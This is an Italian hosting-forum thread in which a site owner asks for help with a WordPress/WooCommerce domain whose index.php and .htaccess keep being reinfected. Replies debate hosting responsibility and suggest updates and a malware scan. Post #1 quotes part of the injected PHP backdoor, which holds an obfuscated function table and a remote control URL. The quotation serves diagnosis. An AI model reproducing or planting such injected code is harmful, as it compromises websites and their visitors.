+ Rispondi alla Discussione
Risultati da 1 a 11 di 11

[Dominio] File con permessi 444 e codice malevolo

Ultimo Messaggio di utixo cloud il:
  1. #1
    Utente Premium L'avatar di felino
    Data Registrazione
    Nov 2009
    Località
    Acicatena - Catania
    Messaggi
    1,804
    Aggiungi felino su Facebook Aggiungi felino su Linkedin

    [Dominio] File con permessi 444 e codice malevolo

    Buongiorno a tutti,
    ho un dominio su Aruba, nel ho pubblicato:
    - un ecommerce nella directory /shop
    - un file index.php nella root che al momento fa un redirect alla cartella /shop

    Da un mesetto circa il file index.php e' stato modificato (non da me) con del codice malevole con tutte le conseguenze del caso.

    Il problema e' che tale file ha i permessi settati a 444, provo a modificarli e ottengo un messaggio di errore.
    Ho richiesto supporto ad Aruba.it per la cancellazione, una volta cancellato viene generato nuovamente.
    Stesso identico problema ce l'ho con il file .htaccess

    Qualche suggerimento?

    Qui una parte del contenuto:
    Codice:
    <?php @'$
    yumingid=47
    lineid=2332
    x3=index.php/
    x4=ghpyxlOwbV
    x5=underlying,roadside,alone,ethics,smaller,hotpants,agree,jasper,horse,Baby,stick,despair,SharkFin,bulk,Apprentice,whole,plow,coconutmilk,trunklineelectrification,inspire,impossible,pantyhose,earthquake,sage,BarberShop,carrier,evidence,English,Latin,definite
    x6=
    x7=http://jnice01.ouuwtizhy573nskt/weilai0.php
    cache=0000
    sps=111111000
    urlgz=[0:3]^[0:8]-[0:6~12][1:6]/[0:8~10]!/|[0:7~10]^/[1:8]/!/[0:10~15]/|[0:8~10]^-[2:10~12]-[2:4]-[2:6]-!/|^-[2:8~12]-[2:5~10]-[0:5][1:8]/![0:3]/|^[0:10~12]/[0:1]_[2:8~12]-!/|[0:10~12]^/[0:6~12]_[1:6]-!/|[0:10~15]_[0:6~10]-^-![0:2]/|[0:10~12]-[0:1]^-[0:4]-[0:1]!-[0:10~12]/|[0:1]^-[0:3]-[0:10~12]-[0:5]-[0:5]!/|^/[0:10~12]_[1:3~5][0:4]-[0:8]-!/|^[0:5]_[1:5]_[2:12~15]_!|[0:3~5]-^-[1:10~12]-[0:10~12]/![0:2]|^[0:6~8]/[1:8~12]-!/[0:5~8]|^_[1:6~8]_[1:6~8]/[2:8~12]_[0:5~8]/!|[0:12]_^-[2:10~15]_[0:6~8]_!|[0:10~15]/^-[1:6~8]/!|^[3:6~10]/[0:1]_[2:12]_!|[0:8]/[0:6~8]/^-!/[0:8~10].php|^/[2:10~12]/[1:8~10]-!-[0:3].jp|^_[1:6~8]/[1:6~8]_[0:10~12][1:5]/!.jp|[0:3]^[0:3]-[2:8]-[1:5][0:3]-[2:6]-[0:6][1:4]/[0:2]!.html|[0:8~10]/^-!/[0:15~18].html|[0:6~8]/[0:15~18]/^-!.html
    ';$bbb6b6b66=explode("1l","tilps_gerp1ledocnelru1lemaner1lyarra_ni1lezilairesnu1lstegf1l5dm1lcexe_lruc1lofniphp1lstnetnoc_teg_elif1lrtsbus1ldomhc1llla_hctam_gerp1ldnar_tm1lrewolotrts1lnelrts1lrhc1letad1lemit1lemitmelif1lliec1lgnol2pi1lnepof1ltroba_resu_erongi1lsehsalscdda1ldnar_yarra1llru_esrap1lenifed1ledocedlru1lemanybtsohteg1lelffuhs1lfoef1lrtrts1ltini_lruc1ltfihsnu_yarra1lftnirps1ledolpmi1lciremun_si1lhcuot1letirwf1lyarra_si1lemitotrts1ltimil_emit_tes1lredaeh1legrem_yarra1leuqinu_yarra1ltrats_bo1ltnuoc1lelif_si1lstsixe_noitcnuf1lstsixe_elif1lhctam_gerp1lecalper_gerp1leikooctes1lsoprts1lmirt1lsopirts1lrddaybtsohteg1ltcartxe1legnar1lesolcf1ldro1ledolpxe1lpop_yarra1lsoprrts1lesolc_lruc1ltpotes_lruc1lecalper_rts");foreach($bbb6b6b66 as$b6bbbbbbb=>$bbbb6b6)
    .....

  2. #2
    Moderatore L'avatar di Sermatica
    Data Registrazione
    Sep 2016
    Località
    Maleo
    Messaggi
    4,171
    Aggiungi Sermatica su Facebook
    Ciao
    hai una falla nel sito, che Cms usi? E' tutto aggiornato? Se si ricontatta l'Hosting e chiedigli la risoluzione o identificazione del problema. Se non rispondono o identificano cambia Hosting.
    MODHelp Center: consigli per il tuo progettoMODE-Commerce
    Consulente con P.IVA: SEO / SEM / Google Business / Amazon - Sermatica.it


  3. #3
    User L'avatar di Shazan
    Data Registrazione
    Oct 2005
    Località
    Catania
    Messaggi
    411
    Citazione Originariamente Scritto da felino Visualizza Messaggio
    Buongiorno a tutti
    Ciao,

    Citazione Originariamente Scritto da felino Visualizza Messaggio
    Qualche suggerimento?
    Sì, quello di trasferirlo altrove, magari presso qualcuno che ha un filtro antimalware/antivirus sul server...
    Noamweb- Domini, hosting, VPS, server dedicati

  4. #4
    User Newbie L'avatar di utixo cloud
    Data Registrazione
    Mar 2019
    Località
    Milano
    Messaggi
    5
    Aggiungi utixo cloud su Linkedin
    La fate un po facile !
    qui hanno usato una vulnerabilita applicativa per accedere al file system, l'hoster puo fare dei controlli ed avere anche tool di antivirus ma se il codice e scritto male ce poco da fare, se tu scrivi un codice che permette l'upload di files non sicuro ci metto 5 minuti ad usarlo e l'hoster che fa lo blocca? L'applicazione deve essere scritta in modo corretto e sicuro altrimenti l'ISP non puo rimediare e se LO FA avrai 1000 problem perché TROPPA sicurezza vuole dire non fare funzionare 1000 cose… la risposta semplice e cambia provider e poi continua a cambiarlo, non e suo compito garantire al sicurezza applicativa.

    Utixo Cloud Services

  5. #5
    User L'avatar di Shazan
    Data Registrazione
    Oct 2005
    Località
    Catania
    Messaggi
    411
    Citazione Originariamente Scritto da utixo cloud Visualizza Messaggio
    se tu scrivi un codice che permette l'upload di files non sicuro ci metto 5 minuti ad usarlo e l'hoster che fa lo blocca?
    Sì, siamo nel 2019, un buon application firewall può riconoscere e bloccare dei POST malevoli senza grossi problemi, sia tramite signature che tramite predizioni di tipo euristico, con basso rischio di falsi positivi.
    Poi è chiaro che può sempre esserci un zeroday o qualcosa possa sfuggire al controllo ma, nel caso specifico, disponendo del codice malevolo, se è sempre lo stesso, non è che ci voglia granchè a bloccarlo...
    Noamweb- Domini, hosting, VPS, server dedicati

  6. #6
    User Newbie L'avatar di utixo cloud
    Data Registrazione
    Mar 2019
    Località
    Milano
    Messaggi
    5
    Aggiungi utixo cloud su Linkedin
    Citazione Originariamente Scritto da Shazan Visualizza Messaggio
    Sì, siamo nel 2019, un buon application firewall può riconoscere e bloccare dei POST malevoli senza grossi problemi, sia tramite signature che tramite predizioni di tipo euristico, con basso rischio di falsi positivi.
    Poi è chiaro che può sempre esserci un zeroday o qualcosa possa sfuggire al controllo ma, nel caso specifico, disponendo del codice malevolo, se è sempre lo stesso, non è che ci voglia granchè a bloccarlo...
    La sicurezza e' una cosa piu complessa che installare semplicemente un antivirus da pochi Euro sul server o abilitare il mod_security ... ci sono piu livelli da proteggere dal sistema operativo al layer del pannello di controllo, all'interprete PHP e anche all'applicativo ...senza entrare nel merito preciso nel caso è difficile dare un giudizio se e colpa di Aruba o no ... e questo che voglio dire ..
    Utixo Cloud Services

  7. #7
    Utente Premium L'avatar di felino
    Data Registrazione
    Nov 2009
    Località
    Acicatena - Catania
    Messaggi
    1,804
    Aggiungi felino su Facebook Aggiungi felino su Linkedin
    Grazie del supporto.

    L'ecommerce e' realizzato tramite Wordpress + WooCommerce.

    Ho preso in gestione il tutto da qualche settimana.
    Il problema, secondo me, e' stato generato da una backup sul dominio stesso di una versione di Woordpress+Woocommerce abbastanza datata!

    Ho provveduto ad eliminare il superfluo ed aggiornare il CMS, i relativi plugin ed il theme con l'ultima versione online.

  8. #8
    Utente Premium L'avatar di Xlogic
    Data Registrazione
    Jan 2011
    Località
    Torino
    Messaggi
    464
    Se nel tuo hosting non è presente un anti-malware o anti-virus esegui una scansione con sucuri: https://sitecheck.sucuri.net/

    Ciao.
    << Xlogic Hosting>> Sconto 30% Estate 2019

  9. #9
    Utente Premium L'avatar di felino
    Data Registrazione
    Nov 2009
    Località
    Acicatena - Catania
    Messaggi
    1,804
    Aggiungi felino su Facebook Aggiungi felino su Linkedin
    Ecco qui il risultato della scansione:
    Outdated Software Detected PHP under 5.6.40 Vulnerabilities on PHP 5.6
    Outdated Software Detected WordPress under 5.1.1/5.0.4/4.9.10

    Ovviamente sto gia' provvedendo all'aggiornamento di entrambi.

    Grazie per avermi segnalato questo tool.





    Security Updates

  10. #10
    Moderatore L'avatar di francois007
    Data Registrazione
    Apr 2006
    Località
    Debian City
    Messaggi
    1,074
    Segui francois007 su Twitter Aggiungi francois007 su Facebook
    Citazione Originariamente Scritto da utixo cloud Visualizza Messaggio
    La fate un po facile !
    qui hanno usato una vulnerabilita applicativa per accedere al file system, l'hoster puo fare dei controlli ed avere anche tool di antivirus ma se il codice e scritto male ce poco da fare, se tu scrivi un codice che permette l'upload di files non sicuro ci metto 5 minuti ad usarlo e l'hoster che fa lo blocca? L'applicazione deve essere scritta in modo corretto e sicuro altrimenti l'ISP non puo rimediare e se LO FA avrai 1000 problem perché TROPPA sicurezza vuole dire non fare funzionare 1000 cose… la risposta semplice e cambia provider e poi continua a cambiarlo, non e suo compito garantire al sicurezza applicativa.

    Utixo Cloud Services
    Se per te troppa sicurezza significa non far funzionare 1000 cose, sono del parere che devi cambiare mestiere!
    Il tuo messaggio è fuorviante e non voglio, non posso permettere che passi per buono. Nulla di personale.

    Good hacking!

  11. #11
    User Newbie L'avatar di utixo cloud
    Data Registrazione
    Mar 2019
    Località
    Milano
    Messaggi
    5
    Aggiungi utixo cloud su Linkedin
    Citazione Originariamente Scritto da francois007 Visualizza Messaggio
    Se per te troppa sicurezza significa non far funzionare 1000 cose, sono del parere che devi cambiare mestiere!
    Il tuo messaggio è fuorviante e non voglio, non posso permettere che passi per buono. Nulla di personale.

    Good hacking!
    leggo ora la tua risposta ... si troppa sicurezza vuole dire limitare le possibilita dell'utente di fare certe operazioni, se ti impedisco di uplodare files rendo il sistema sicurissimo ma forse qualche utente non sara contento ...
    MAI visto un moderatore che dice ad un utente di cambiare lavoro , che serieta e questa?
    Utixo Cloud Services

+ Rispondi alla Discussione

Tag per Questa Discussione

^ Permessi di Scrittura

  • Tu non puoi inviare nuove discussioni
  • Tu non puoi inviare risposte
  • Tu non puoi inviare allegati
  • Tu non puoi modificare i tuoi messaggi
  •  
  • Il codice BB è Attivato
  • Le faccine sono Attivato
  • Il codice [IMG] è Attivato
  • Il codice [VIDEO] è Attivato
  • Il codice HTML è Disattivato
  • Trackbacks Attivato
  • Pingback Attivato
  • Refback Attivato

SEO by vBSEO 3.6.0 PL2 ©2011, Crawlability, Inc.